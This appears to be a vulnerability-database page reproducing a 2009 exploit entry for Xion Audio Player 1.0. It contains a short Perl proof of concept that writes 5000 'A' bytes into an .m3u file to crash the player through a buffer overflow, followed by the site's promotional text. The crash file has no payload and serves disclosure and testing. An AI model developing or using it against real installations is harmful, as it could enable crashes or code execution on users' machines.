Lucene search
K

Xion Audio Player 1.0 121 m3u file buffer overflow

🗓️ 16 Oct 2009 00:00:00Reported by Dragon RiderType 
zdt
 zdt
🔗 0day.today👁 19 Views

Xion Audio Player 1.0 m3u buffer overflow vulnerability discovered and demonstrated by Dragon Rider.

Code
==================================================
Xion Audio Player 1.0 121 m3u file buffer overflow
==================================================



# Title: Xion Audio Player 1.0 121 m3u file buffer overflow
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dragon Rider
# Published: 2009-10-16
# Verified: yes

view source
print?
#!/usr/bin/perl
#=====================================
#Xion Audio Player(.m3u File) Local buffer Overflow PoC
#download:http://www.brothersoft.com/xion-audio-player-download-49404.html
#=====================================
#Author:Dragon Rider
#=====================================
#tested on WinXp SP3
 
my $crash = "\x41" x 5000;
open(myfile,'>>DragonR.m3u');
print myfile $crash;                      





#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation